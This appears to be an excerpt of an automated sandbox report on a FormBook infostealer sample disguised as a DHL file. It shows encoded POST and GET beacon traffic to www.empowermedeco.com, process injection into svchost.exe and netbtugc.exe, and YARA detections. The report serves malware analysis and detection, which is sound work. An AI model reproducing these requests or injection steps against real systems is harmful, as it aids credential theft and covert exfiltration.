                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 30 2b 6a 75 71 78 72 4b 66 65 4a 78 78 35 45 69 47 4c 51 32 64 33 7a 48 6a 6f
                                                                                      Data Ascii: LzY4r=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv90+juqxrKfeJxx5EiGLQ2d3zHjo
                                                                                      Dec 6, 2024 17:46:53.552764893 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:53 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      22 | 192.168.2.9 | 49996 | 217.196.55.202 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:55.010230064 CET | 801 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 30 67 71 41 64 71 62 39 2b 4b 48 66 33 44 58 43 6c 46 4f 33 44 75 31 54 4f 67 3d 3d
                                                                                      Data Ascii: LzY4r=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQ0gqAdqb9+KHf3DXClFO3Du1TOg==
                                                                                      Dec 6, 2024 17:46:56.209917068 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:56 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      23 | 192.168.2.9 | 49997 | 217.196.55.202 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:57.665819883 CET | 1814 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 31 33 44 6c 54 76 7a 63 2f 49 66 64 6e 42 33 32 7a 57 54 57 4b 66 59 72 65 55 75 34 78 6b 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                                                      Data Ascii: LzY4r= [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:58.878333092 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:58 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      24 | 192.168.2.9 | 49998 | 217.196.55.202 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:47:00.317390919 CET | 509 | OUT | GET /fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.empowermedeco.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:47:01.524945974 CET | 1226 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:47:01 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



                                                                                      Target ID:0
                                                                                      Start time:11:43:03
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Users\user\Desktop\DHL 30312052024.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DHL 30312052024.exe"
                                                                                      Imagebase:0xc00000
                                                                                      File size:1'208'832 bytes
                                                                                      MD5 hash:E414A371A1BE9843BA41AD3B33B1D734
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:11:43:07
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DHL 30312052024.exe"
                                                                                      Imagebase:0xa20000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:11:43:15
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe"
                                                                                      Imagebase:0xdd0000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:4
                                                                                      Start time:11:43:16
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                      Imagebase:0x670000
                                                                                      File size:22'016 bytes
                                                                                      MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:11:43:29
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe"
                                                                                      Imagebase:0xdd0000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:11:43:42
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff73feb0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:3.4%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:9.8%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:165
                                                                                        execution_graph 104566 c03633 104567 c0366a 104566->104567 104568 c036e7 104567->104568 104569 c03688 104567->104569 104570 c036e5 104567->104570 104574 c036ed 104568->104574 104575 c3d0cc 104568->104575 104571 c03695 104569->104571 104572 c0374b PostQuitMessage 104569->104572 104573 c036ca DefWindowProcW 104570->104573 104577 c036a0 104571->104577 104578 c3d154 104571->104578 104579 c036d8 104572->104579 104573->104579 104580 c036f2 104574->104580 104581 c03715 SetTimer RegisterWindowMessageW 104574->104581 104621 c11070 10 API calls Mailbox 104575->104621 104583 c03755 104577->104583 104584 c036a8 104577->104584 104637 c62527 71 API calls _memset 104578->104637 104587 c036f9 KillTimer 104580->104587 104588 c3d06f 104580->104588 104581->104579 104585 c0373e CreatePopupMenu 104581->104585 104582 c3d0f3 104622 c11093 331 API calls Mailbox 104582->104622 104611 c044a0 104583->104611 104590 c036b3 104584->104590 104591 c3d139 104584->104591 104585->104579 104618 c0443a Shell_NotifyIconW _memset 104587->104618 104594 c3d074 104588->104594 104595 c3d0a8 MoveWindow 104588->104595 104597 c036be 104590->104597 104598 c3d124 104590->104598 104591->104573 104636 c57c36 59 API calls Mailbox 104591->104636 104592 c3d166 104592->104573 104592->104579 104599 c3d097 SetFocus 104594->104599 104600 c3d078 104594->104600 104595->104579 104597->104573 104623 c0443a Shell_NotifyIconW _memset 104597->104623 104635 c62d36 81 API calls _memset 104598->104635 104599->104579 104600->104597 104604 c3d081 104600->104604 104601 c0370c 104619 c03114 DeleteObject DestroyWindow Mailbox 104601->104619 104620 c11070 10 API calls Mailbox 104604->104620 104607 c3d134 104607->104579 104609 c3d118 104624 c0434a 104609->104624 104612 c044b7 _memset 104611->104612 104613 c04539 104611->104613 104638 c0407c 104612->104638 104613->104579 104615 c04522 KillTimer SetTimer 104615->104613 104616 c3d4ab Shell_NotifyIconW 
